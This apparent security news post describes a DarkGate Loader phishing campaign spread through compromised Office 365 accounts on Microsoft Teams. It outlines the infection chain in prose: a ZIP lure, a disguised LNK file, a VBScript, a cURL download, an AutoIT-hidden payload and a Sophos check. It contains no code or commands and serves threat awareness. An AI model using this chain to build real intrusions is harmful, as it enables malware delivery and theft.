DarkGate Malware Exploitation via Microsoft Teams
No attachments for this post
A recent phishing strategy uses Microsoft Teams to distribute malicious attachments carrying the DarkGate Loader malware. Initiated in late August 2023, two compromised Office 365 accounts began sending Microsoft Teams phishing messages, luring users with a "Changes to the vacation schedule" ZIP file. Opening this leads to a SharePoint download containing a disguised LNK file, posing as a PDF.
Truesec's investigation into the campaign revealed that this ZIP file carried a harmful VBScript initiating the DarkGate Loader's infection process. The malware cleverly evades detection by using Windows cURL for downloading and concealing its malicious code within an AutoIT script. Before initiating, the script checks for the presence of Sophos antivirus. Without it, the script unveils additional code and launches the shellcode. This shellcode then crafts the DarkGate executable and loads it.
While this campaign mirrors a June 2023 Microsoft Teams phishing technique reported by Jumpsec, Microsoft opted not to directly combat the risk, suggesting safer configurations to admins instead. A Red Teamer even released a tool in July 2023, simplifying this phishing approach.
DarkGate, operational since 2017, is a formidable malware used by a select group of cybercriminals for targeted attacks. Its capabilities include remote access, cryptocurrency mining, keylogging, and information theft. In June 2023, its alleged creator tried selling access for a staggering $100k/year. Recent months have seen a surge in its distribution via channels like phishing.
Although not yet a ubiquitous threat, DarkGate's growing reach and diversification make it a menace to watch.
Comments on this post
No comments have been added for this post.
You must be logged in to make a comment.